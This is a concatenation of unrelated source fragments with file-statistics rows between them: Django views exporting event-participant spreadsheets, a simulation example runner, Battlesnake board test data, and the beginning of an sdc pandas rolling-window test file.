generated = strftime("%d-%m-%Y %H:%M:%S UTC", gmtime())
worksheet.write(0, 1, generated)
worksheet.write(1, 0, "ID")
worksheet.write(1, 1, "Name")
worksheet.write(1, 2, "College")
worksheet.write(1, 3, "Degree")
worksheet.write(1, 4, "Year")
worksheet.write(1, 5, "Phone")
worksheet.write(1, 6, "Email")
worksheet.write(1, 7, "Description")
worksheet.write(1, 8, "Root Mail")
worksheet.write(1, 9, "PCR Approved")
for i, ca in enumerate(entries):
"""for each object in the date list, attribute1 & attribute2
are written to the first & second column respectively,
for the relevant row. The 3rd arg is a failure message if
there is no data available"""
worksheet.write(i+2, 0, deepgetattr(ca, 'id', 'NA'))
worksheet.write(i+2, 1, deepgetattr(ca, 'name', 'NA'))
worksheet.write(i+2, 2, deepgetattr(ca, 'college.name', 'NA'))
worksheet.write(i+2, 3, deepgetattr(ca, 'degree', 'NA'))
worksheet.write(i+2, 4, deepgetattr(ca, 'year', 'NA'))
worksheet.write(i+2, 5, deepgetattr(ca, 'phone', 'NA'))
worksheet.write(i+2, 6, deepgetattr(ca, 'email', 'NA'))
worksheet.write(i+2, 7, deepgetattr(ca, 'ambassador_quality', 'NA'))
worksheet.write(i+2, 8, deepgetattr(ca, 'root_mail', 'NA'))
worksheet.write(i+2, 9, deepgetattr(ca, 'pcr_approved', 'NA'))
workbook.close()
filename = 'ExcelReport.xlsx'
output.seek(0)
response = HttpResponse(output.read(), content_type="application/ms-excel")
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
def dhiti_xlsx(request):
a_list = []
event= Event.objects.filter(name='Dhiti')
entries = Participant.objects.filter(events__in=event)
for p in entries:
a_list.append({'obj': p})
data = sorted(a_list, key=lambda k: k['obj'].id)
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('new-spreadsheet')
date_format = workbook.add_format({'num_format': 'mmmm d yyyy'})
worksheet.write(0, 0, "Generated:")
from time import gmtime, strftime
generated = strftime("%d-%m-%Y %H:%M:%S UTC", gmtime())
worksheet.write(0, 1, generated)
worksheet.write(1, 0, "ID")
worksheet.write(1, 1, "Name")
worksheet.write(1, 2, "College")
worksheet.write(1, 3, "city")
worksheet.write(1, 4, "phone_one")
worksheet.write(1, 5, "Email")
worksheet.write(1, 6, "Email Verified")
worksheet.write(1, 7, "Pcr Approval")
worksheet.write(1, 8, "Fee Paid")
for i, row in enumerate(data):
"""for each object in the date list, attribute1 & attribute2
are written to the first & second column respectively,
for the relevant row. The 3rd arg is a failure message if
there is no data available"""
worksheet.write(i+2, 0, deepgetattr(row['obj'], 'id', 'NA'))
worksheet.write(i+2, 1, deepgetattr(row['obj'], 'name', 'NA'))
worksheet.write(i+2, 2, deepgetattr(row['obj'], 'college.name', 'NA'))
worksheet.write(i+2, 3, deepgetattr(row['obj'], 'city', 'NA'))
worksheet.write(i+2, 4, deepgetattr(row['obj'], 'phone_one', 'NA'))
worksheet.write(i+2, 5, deepgetattr(row['obj'], 'email_id', 'NA'))
worksheet.write(i+2, 6, deepgetattr(row['obj'], 'email_verified', 'NA'))
worksheet.write(i+2, 7, deepgetattr(row['obj'], 'pcr_approval', 'NA'))
worksheet.write(i+2, 8, deepgetattr(row['obj'], 'fee_paid', 'NA'))
workbook.close()
filename = 'ExcelReport.xlsx'
output.seek(0)
response = HttpResponse(output.read(), content_type="application/ms-excel")
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
# amb_obs = CampusAmbassador.objects.all()
# return render(request, 'pcradmin/xlsx_ambassadors.html', {'amb_list' : amb_obs})
def RENG_xlsx(request):
a_list = []
event= Event.objects.filter(name='Reverse Engineering')
entries = Participant.objects.filter(events__in=event)
for p in entries:
a_list.append({'obj': p})
data = sorted(a_list, key=lambda k: k['obj'].id)
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('new-spreadsheet')
date_format = workbook.add_format({'num_format': 'mmmm d yyyy'})
worksheet.write(0, 0, "Generated:")
from time import gmtime, strftime
generated = strftime("%d-%m-%Y %H:%M:%S UTC", gmtime())
worksheet.write(0, 1, generated)
worksheet.write(1, 0, "ID")
worksheet.write(1, 1, "Name")
worksheet.write(1, 2, "College")
worksheet.write(1, 3, "city")
worksheet.write(1, 4, "phone_one")
worksheet.write(1, 5, "Email")
worksheet.write(1, 6, "Email Verified")
worksheet.write(1, 7, "Pcr Approval")
worksheet.write(1, 8, "Fee Paid")
for i, row in enumerate(data):
"""for each object in the date list, attribute1 & attribute2
are written to the first & second column respectively,
for the relevant row. The 3rd arg is a failure message if
there is no data available"""
worksheet.write(i+2, 0, deepgetattr(row['obj'], 'id', 'NA'))
worksheet.write(i+2, 1, deepgetattr(row['obj'], 'name', 'NA'))
worksheet.write(i+2, 2, deepgetattr(row['obj'], 'college.name', 'NA'))
worksheet.write(i+2, 3, deepgetattr(row['obj'], 'city', 'NA'))
worksheet.write(i+2, 4, deepgetattr(row['obj'], 'phone_one', 'NA'))
worksheet.write(i+2, 5, deepgetattr(row['obj'], 'email_id', 'NA'))
worksheet.write(i+2, 6, deepgetattr(row['obj'], 'email_verified', 'NA'))
worksheet.write(i+2, 7, deepgetattr(row['obj'], 'pcr_approval', 'NA'))
worksheet.write(i+2, 8, deepgetattr(row['obj'], 'fee_paid', 'NA'))
workbook.close()
filename = 'ExcelReport.xlsx'
output.seek(0)
response = HttpResponse(output.read(), content_type="application/ms-excel")
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
def innover_xlsx(request):
a_list = []
event= Event.objects.filter(name='Innover')
entries = Participant.objects.filter(events__in=event)
for p in entries:
a_list.append({'obj': p})
data = sorted(a_list, key=lambda k: k['obj'].id)
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('new-spreadsheet')
date_format = workbook.add_format({'num_format': 'mmmm d yyyy'})
worksheet.write(0, 0, "Generated:")
from time import gmtime, strftime
generated = strftime("%d-%m-%Y %H:%M:%S UTC", gmtime())
worksheet.write(0, 1, generated)
worksheet.write(1, 0, "ID")
worksheet.write(1, 1, "Name")
worksheet.write(1, 2, "College")
worksheet.write(1, 3, "city")
worksheet.write(1, 4, "phone_one")
worksheet.write(1, 5, "Email")
worksheet.write(1, 6, "Email Verified")
worksheet.write(1, 7, "Pcr Approval")
worksheet.write(1, 8, "Fee Paid")
for i, row in enumerate(data):
"""for each object in the date list, attribute1 & attribute2
are written to the first & second column respectively,
for the relevant row. The 3rd arg is a failure message if
there is no data available"""
worksheet.write(i+2, 0, deepgetattr(row['obj'], 'id', 'NA'))
worksheet.write(i+2, 1, deepgetattr(row['obj'], 'name', 'NA'))
worksheet.write(i+2, 2, deepgetattr(row['obj'], 'college.name', 'NA'))
worksheet.write(i+2, 3, deepgetattr(row['obj'], 'city', 'NA'))
worksheet.write(i+2, 4, deepgetattr(row['obj'], 'phone_one', 'NA'))
worksheet.write(i+2, 5, deepgetattr(row['obj'], 'email_id', 'NA'))
worksheet.write(i+2, 6, deepgetattr(row['obj'], 'email_verified', 'NA'))
worksheet.write(i+2, 7, deepgetattr(row['obj'], 'pcr_approval', 'NA'))
worksheet.write(i+2, 8, deepgetattr(row['obj'], 'fee_paid', 'NA'))
workbook.close()
filename = 'ExcelReport.xlsx'
output.seek(0)
response = HttpResponse(output.read(), content_type="application/ms-excel")
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
def participant_excel(request):
a_list = []
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('part_apogee')
plist = Participant.objects.filter(msp=None)
worksheet.write(0, 0, "Name")
worksheet.write(0, 1, "Gender")
worksheet.write(0, 2, "phone")
worksheet.write(0, 3, "email")
worksheet.write(0, 4, "college")
rowno = 1
for x in plist:
collegep = x.college
colno = 1
worksheet.write(rowno, 0, x.name)
worksheet.write(rowno, 1, x.gender)
worksheet.write(rowno, 2, x.phone)
worksheet.write(rowno, 3, x.email)
worksheet.write(rowno, 4, collegep.name)
rowno+=1
workbook.close()
filename = 'part_apogee.xlsx'
output.seek(0)
response = HttpResponse(output.read(), content_type="application/ms-excel")
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
| 35.393822
| 83
| 0.696956
| 1,331
| 9,167
| 4.746807
| 0.117956
| 0.203862
| 0.087844
| 0.093701
| 0.832225
| 0.821621
| 0.821621
| 0.797879
| 0.787433
| 0.760525
| 0
| 0.024869
| 0.127086
| 9,167
| 258
| 84
| 35.531008
| 0.764684
| 0.0132
| 0
| 0.720207
| 0
| 0
| 0.177653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025907
| false
| 0
| 0.062176
| 0
| 0.11399
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2ef02c3e4efc237f53dec0244006fe447fa7dd5
| 182
|
py
|
Python
|
exec/resources/simple_run.py
|
Fladdimir/casymda
|
6cf599bed2229c4aff9bca31350604b38ef76138
|
[
"MIT"
] | 19
|
2020-04-18T14:47:37.000Z
|
2022-03-26T14:18:21.000Z
|
exec/resources/simple_run.py
|
Fladdimir/casymda
|
6cf599bed2229c4aff9bca31350604b38ef76138
|
[
"MIT"
] | 4
|
2020-03-17T21:01:58.000Z
|
2021-09-24T21:07:25.000Z
|
exec/resources/simple_run.py
|
Fladdimir/casymda
|
6cf599bed2229c4aff9bca31350604b38ef76138
|
[
"MIT"
] | 4
|
2020-05-09T16:31:57.000Z
|
2022-01-23T09:11:19.000Z
|
import sys
sys.path.append(".")
from examples.resources import simple_run_resource_example_test
if __name__ == "__main__":
simple_run_resource_example_test.test_simple_run()
| 18.2
| 63
| 0.802198
| 25
| 182
| 5.12
| 0.6
| 0.210938
| 0.265625
| 0.375
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10989
| 182
| 9
| 64
| 20.222222
| 0.790123
| 0
| 0
| 0
| 0
| 0
| 0.049451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
0c33579592df7402301b13a7573b50686359c0b7
| 16,815
|
py
|
Python
|
app/Python-Snake/Python-Snake/test_data.py
|
Simobergius/starter-snake-python
|
d9ad718c78389125be679938fa362d73b19a1084
|
[
"MIT"
] | null | null | null |
app/Python-Snake/Python-Snake/test_data.py
|
Simobergius/starter-snake-python
|
d9ad718c78389125be679938fa362d73b19a1084
|
[
"MIT"
] | null | null | null |
app/Python-Snake/Python-Snake/test_data.py
|
Simobergius/starter-snake-python
|
d9ad718c78389125be679938fa362d73b19a1084
|
[
"MIT"
] | null | null | null |
data1 = {
'board': {
'snakes': [
{'body': [
{'x': 5, 'y': 5},
{'x': 5, 'y': 6},
{'x': 4, 'y': 6},
{'x': 3, 'y': 6},
{'x': 3, 'y': 5},
{'x': 3, 'y': 4},
{'x': 4, 'y': 4},
{'x': 5, 'y': 4},
{'x': 6, 'y': 4},
{'x': 7, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 10,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 2, 'y': 2},
]
},
'you': {
'body': [
{'x': 5, 'y': 5},
{'x': 5, 'y': 6},
{'x': 4, 'y': 6},
{'x': 3, 'y': 6},
{'x': 3, 'y': 5},
{'x': 3, 'y': 4},
{'x': 4, 'y': 6},
{'x': 5, 'y': 6},
{'x': 6, 'y': 6},
{'x': 7, 'y': 6}
],
'health': 100,
'id': 'testsnake',
'length': 10,
'name': 'testsnake',
'object': 'snake'
}
}
data2 = {
'board': {
'snakes': [
{'body': [
{'x': 5, 'y': 5},
{'x': 5, 'y': 6},
{'x': 5, 'y': 7},
{'x': 4, 'y': 7},
{'x': 3, 'y': 7},
{'x': 2, 'y': 7},
{'x': 2, 'y': 6},
{'x': 2, 'y': 5},
{'x': 2, 'y': 4},
{'x': 3, 'y': 4},
{'x': 4, 'y': 4},
{'x': 5, 'y': 4},
{'x': 6, 'y': 4},
{'x': 7, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 14,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 2, 'y': 2},
]
},
'you': {
'body': [
{'x': 5, 'y': 5},
{'x': 5, 'y': 6},
{'x': 5, 'y': 7},
{'x': 4, 'y': 7},
{'x': 3, 'y': 7},
{'x': 2, 'y': 7},
{'x': 2, 'y': 6},
{'x': 2, 'y': 5},
{'x': 2, 'y': 4},
{'x': 3, 'y': 4},
{'x': 4, 'y': 4},
{'x': 5, 'y': 4},
{'x': 6, 'y': 4},
{'x': 7, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 14,
'name': 'testsnake',
'object': 'snake'
}
}
data3 = {
'board': {
'snakes': [
{'body': [
{'x': 0, 'y': 1},
{'x': 1, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 2,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 5, 'y': 5},
]
},
'you': {
'body': [
{'x': 0, 'y': 1},
{'x': 1, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 2,
'name': 'testsnake',
'object': 'snake'
}
}
data4 = {
'board': {
'snakes': [
{'body': [
{'x': 2, 'y': 0},
{'x': 1, 'y': 0},
{'x': 0, 'y': 0},
{'x': 0, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 4,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 2, 'y': 0},
{'x': 1, 'y': 0},
{'x': 0, 'y': 0},
{'x': 0, 'y': 1}
],
'health': 100,
'id': 'testsnake',
'length': 4,
'name': 'testsnake',
'object': 'snake'
}
}
data5 = {
'board': {
'snakes': [
{'body': [
{'x': 3, 'y': 0},
{'x': 3, 'y': 0},
{'x': 3, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 3, 'y': 0},
{'x': 3, 'y': 0},
{'x': 3, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
}
data52 = {
'board': {
'snakes': [
{'body': [
{'x': 0, 'y': 3},
{'x': 0, 'y': 3},
{'x': 0, 'y': 3}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 0, 'y': 3},
{'x': 0, 'y': 3},
{'x': 0, 'y': 3}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
}
data53 = {
'board': {
'snakes': [
{'body': [
{'x': 3, 'y': 9},
{'x': 3, 'y': 9},
{'x': 3, 'y': 9}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 3, 'y': 9},
{'x': 3, 'y': 9},
{'x': 3, 'y': 9}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
}
data54 = {
'board': {
'snakes': [
{'body': [
{'x': 9, 'y': 3},
{'x': 9, 'y': 3},
{'x': 9, 'y': 3}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 1, 'y': 1},
]
},
'you': {
'body': [
{'x': 9, 'y': 3},
{'x': 9, 'y': 3},
{'x': 9, 'y': 3}
],
'health': 100,
'id': 'testsnake',
'length': 3,
'name': 'testsnake',
'object': 'snake'
}
}
data6 = {
'board': {
'snakes': [
{'body': [
{'x': 0, 'y': 7},
{'x': 0, 'y': 8},
{'x': 1, 'y': 8},
{'x': 1, 'y': 7},
{'x': 1, 'y': 6},
{'x': 1, 'y': 5},
{'x': 1, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 7,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 5, 'y': 8},
]
},
'you': {
'body': [
{'x': 0, 'y': 7},
{'x': 0, 'y': 8},
{'x': 1, 'y': 8},
{'x': 1, 'y': 7},
{'x': 1, 'y': 6},
{'x': 1, 'y': 5},
{'x': 1, 'y': 4}
],
'health': 100,
'id': 'testsnake',
'length': 7,
'name': 'testsnake',
'object': 'snake'
}
}
data7 = {
'board': {
'snakes': [
{'body': [
{'x': 4, 'y': 2},
{'x': 4, 'y': 1},
{'x': 5, 'y': 1},
{'x': 5, 'y': 2},
{'x': 5, 'y': 3},
{'x': 5, 'y': 4},
{'x': 5, 'y': 5},
{'x': 4, 'y': 5},
{'x': 3, 'y': 5},
{'x': 3, 'y': 4},
{'x': 3, 'y': 3},
{'x': 2, 'y': 3},
{'x': 1, 'y': 3}
],
'health': 100,
'id': 'testsnake',
'length': 13,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 5, 'y': 8},
]
},
'you': {
'body': [
{'x': 4, 'y': 2},
{'x': 4, 'y': 1},
{'x': 5, 'y': 1},
{'x': 5, 'y': 2},
{'x': 5, 'y': 3},
{'x': 5, 'y': 4},
{'x': 5, 'y': 5},
{'x': 4, 'y': 5},
{'x': 3, 'y': 5},
{'x': 3, 'y': 4},
{'x': 3, 'y': 3},
{'x': 2, 'y': 3},
{'x': 1, 'y': 3}
],
'health': 100,
'id': 'testsnake',
'length': 13,
'name': 'testsnake',
'object': 'snake'
}
}
data8 = {
'board': {
'snakes': [
{'body': [
{'x': 8, 'y': 29},
{'x': 8, 'y': 28},
{'x': 7, 'y': 28},
{'x': 6, 'y': 27},
{'x': 6, 'y': 26},
{'x': 6, 'y': 25},
{'x': 6, 'y': 24},
{'x': 6, 'y': 23},
{'x': 6, 'y': 22},
{'x': 6, 'y': 21},
{'x': 6, 'y': 20},
{'x': 6, 'y': 19},
{'x': 6, 'y': 18},
{'x': 6, 'y': 17},
{'x': 6, 'y': 16},
{'x': 6, 'y': 15},
{'x': 6, 'y': 14},
{'x': 6, 'y': 13},
{'x': 6, 'y': 12},
{'x': 6, 'y': 11},
{'x': 6, 'y': 10},
{'x': 6, 'y': 9},
{'x': 6, 'y': 8},
{'x': 6, 'y': 7},
{'x': 6, 'y': 6},
{'x': 6, 'y': 5},
{'x': 6, 'y': 4},
{'x': 6, 'y': 3},
{'x': 6, 'y': 2},
{'x': 6, 'y': 1},
{'x': 7, 'y': 1},
{'x': 8, 'y': 1},
{'x': 9, 'y': 1},
{'x': 9, 'y': 2}
],
'health': 100,
'id': 'testsnake',
'length': 34,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 30,
'width': 30,
'food': [
{'x': 5, 'y': 8},
]
},
'you': {
'body': [
{'x': 8, 'y': 29},
{'x': 8, 'y': 28},
{'x': 7, 'y': 28},
{'x': 6, 'y': 27},
{'x': 6, 'y': 26},
{'x': 6, 'y': 25},
{'x': 6, 'y': 24},
{'x': 6, 'y': 23},
{'x': 6, 'y': 22},
{'x': 6, 'y': 21},
{'x': 6, 'y': 20},
{'x': 6, 'y': 19},
{'x': 6, 'y': 18},
{'x': 6, 'y': 17},
{'x': 6, 'y': 16},
{'x': 6, 'y': 15},
{'x': 6, 'y': 14},
{'x': 6, 'y': 13},
{'x': 6, 'y': 12},
{'x': 6, 'y': 11},
{'x': 6, 'y': 10},
{'x': 6, 'y': 9},
{'x': 6, 'y': 8},
{'x': 6, 'y': 7},
{'x': 6, 'y': 6},
{'x': 6, 'y': 5},
{'x': 6, 'y': 4},
{'x': 6, 'y': 3},
{'x': 6, 'y': 2},
{'x': 6, 'y': 1},
{'x': 7, 'y': 1},
{'x': 8, 'y': 1},
{'x': 9, 'y': 1},
{'x': 9, 'y': 2}
],
'health': 100,
'id': 'testsnake',
'length': 34,
'name': 'testsnake',
'object': 'snake'
}
}
data9 = {
'board': {
'snakes': [
{'body': [
{'x': 4, 'y': 2},
{'x': 4, 'y': 3},
{'x': 4, 'y': 4},
{'x': 3, 'y': 4},
{'x': 2, 'y': 4},
{'x': 1, 'y': 4},
{'x': 1, 'y': 3},
{'x': 1, 'y': 2},
{'x': 1, 'y': 1},
{'x': 2, 'y': 1},
{'x': 3, 'y': 1},
{'x': 3, 'y': 0},
{'x': 2, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 13,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 10,
'width': 10,
'food': [
{'x': 2, 'y': 6},
]
},
'you': {
'body': [
{'x': 4, 'y': 2},
{'x': 4, 'y': 3},
{'x': 4, 'y': 4},
{'x': 3, 'y': 4},
{'x': 2, 'y': 4},
{'x': 1, 'y': 4},
{'x': 1, 'y': 3},
{'x': 1, 'y': 2},
{'x': 1, 'y': 1},
{'x': 2, 'y': 1},
{'x': 3, 'y': 1},
{'x': 3, 'y': 0},
{'x': 2, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 13,
'name': 'testsnake',
'object': 'snake'
}
}
data_dead_end_with_tail = {
'board': {
'snakes': [
{'body': [
{'x': 6, 'y': 0},
{'x': 6, 'y': 1},
{'x': 6, 'y': 2},
{'x': 6, 'y': 3},
{'x': 5, 'y': 3},
{'x': 4, 'y': 3},
{'x': 4, 'y': 4},
{'x': 4, 'y': 5},
{'x': 3, 'y': 5},
{'x': 2, 'y': 5},
{'x': 1, 'y': 5},
{'x': 1, 'y': 4},
{'x': 1, 'y': 3},
{'x': 0, 'y': 3},
{'x': 0, 'y': 4},
{'x': 0, 'y': 5},
{'x': 0, 'y': 6},
{'x': 1, 'y': 6},
{'x': 2, 'y': 6},
{'x': 3, 'y': 6},
{'x': 4, 'y': 6},
{'x': 5, 'y': 6},
{'x': 6, 'y': 6},
{'x': 7, 'y': 6},
{'x': 7, 'y': 5},
{'x': 7, 'y': 4},
{'x': 7, 'y': 3},
{'x': 7, 'y': 2},
{'x': 7, 'y': 1},
{'x': 8, 'y': 1},
{'x': 8, 'y': 2},
{'x': 9, 'y': 2},
{'x': 10, 'y': 2},
{'x': 10, 'y': 1},
{'x': 10, 'y': 0},
{'x': 11, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 36,
'name': 'testsnake',
'object': 'snake'
}
],
'height': 12,
'width': 12,
'food': [
{'x': 8, 'y': 8},
]
},
'you': {
'body': [
{'x': 6, 'y': 0},
{'x': 6, 'y': 1},
{'x': 6, 'y': 2},
{'x': 6, 'y': 3},
{'x': 5, 'y': 3},
{'x': 4, 'y': 3},
{'x': 4, 'y': 4},
{'x': 4, 'y': 5},
{'x': 3, 'y': 5},
{'x': 2, 'y': 5},
{'x': 1, 'y': 5},
{'x': 1, 'y': 4},
{'x': 1, 'y': 3},
{'x': 0, 'y': 3},
{'x': 0, 'y': 4},
{'x': 0, 'y': 5},
{'x': 0, 'y': 6},
{'x': 1, 'y': 6},
{'x': 2, 'y': 6},
{'x': 3, 'y': 6},
{'x': 4, 'y': 6},
{'x': 5, 'y': 6},
{'x': 6, 'y': 6},
{'x': 7, 'y': 6},
{'x': 7, 'y': 5},
{'x': 7, 'y': 4},
{'x': 7, 'y': 3},
{'x': 7, 'y': 2},
{'x': 7, 'y': 1},
{'x': 8, 'y': 1},
{'x': 8, 'y': 2},
{'x': 9, 'y': 2},
{'x': 10, 'y': 2},
{'x': 10, 'y': 1},
{'x': 10, 'y': 0},
{'x': 11, 'y': 0}
],
'health': 100,
'id': 'testsnake',
'length': 36,
'name': 'testsnake',
'object': 'snake'
}
}
| 25.134529
| 35
| 0.191436
| 1,619
| 16,815
| 1.985794
| 0.041384
| 0.042302
| 0.063453
| 0.161742
| 0.952722
| 0.946501
| 0.929393
| 0.929393
| 0.925972
| 0.925039
| 0
| 0.112106
| 0.554921
| 16,815
| 669
| 36
| 25.134529
| 0.317477
| 0
| 0
| 0.87156
| 0
| 0
| 0.137318
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
0c564c18fb4a5f2edf665bb4e687ef1652ddd63f
| 46,787
|
py
|
Python
|
sdc/tests/test_rolling.py
|
samir-nasibli/sdc
|
b9144c8799d6454dec3e5c550e305963b24c1570
|
[
"BSD-2-Clause"
] | null | null | null |
sdc/tests/test_rolling.py
|
samir-nasibli/sdc
|
b9144c8799d6454dec3e5c550e305963b24c1570
|
[
"BSD-2-Clause"
] | null | null | null |
sdc/tests/test_rolling.py
|
samir-nasibli/sdc
|
b9144c8799d6454dec3e5c550e305963b24c1570
|
[
"BSD-2-Clause"
] | null | null | null |
# *****************************************************************************
# Copyright (c) 2019, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
import unittest
import itertools
import os
import pandas as pd
import platform
import numpy as np
import numba
import sdc
from itertools import product
from numba.errors import TypingError
from sdc.tests.test_base import TestCase
from sdc.tests.test_utils import (count_array_REPs, count_parfor_REPs,
count_parfor_OneDs, count_array_OneDs, dist_IR_contains,
skip_numba_jit, skip_sdc_jit,
test_global_input_data_float64)
from sdc.hiframes.rolling import supported_rolling_funcs
LONG_TEST = (int(os.environ['SDC_LONG_ROLLING_TEST']) != 0
if 'SDC_LONG_ROLLING_TEST' in os.environ else False)
test_funcs = ('mean', 'max',)
if LONG_TEST:
# all functions except apply, cov, corr
test_funcs = supported_rolling_funcs[:-3]
def series_rolling_std_usecase(series, window, min_periods, ddof):
return series.rolling(window, min_periods).std(ddof)
def series_rolling_var_usecase(series, window, min_periods, ddof):
return series.rolling(window, min_periods).var(ddof)
class TestRolling(TestCase):
@skip_numba_jit
def test_fixed1(self):
# test sequentially with manually created dfs
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
for func_name in test_funcs:
func_text = "def test_impl(df, w, c):\n return df.rolling(w, center=c).{}()\n".format(func_name)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for args in itertools.product(wins, centers):
df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
df = pd.DataFrame({'B': [0, 1, 2, -2, 4]})
pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
@skip_numba_jit
def test_fixed2(self):
# test sequentially with generated dfs
sizes = (121,)
wins = (3,)
if LONG_TEST:
sizes = (1, 2, 10, 11, 121, 1000)
wins = (2, 3, 5)
centers = (False, True)
for func_name in test_funcs:
func_text = "def test_impl(df, w, c):\n return df.rolling(w, center=c).{}()\n".format(func_name)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for n, w, c in itertools.product(sizes, wins, centers):
df = pd.DataFrame({'B': np.arange(n)})
pd.testing.assert_frame_equal(hpat_func(df, w, c), test_impl(df, w, c))
@skip_numba_jit
def test_fixed_apply1(self):
# test sequentially with manually created dfs
def test_impl(df, w, c):
return df.rolling(w, center=c).apply(lambda a: a.sum())
hpat_func = self.jit(test_impl)
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
for args in itertools.product(wins, centers):
df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
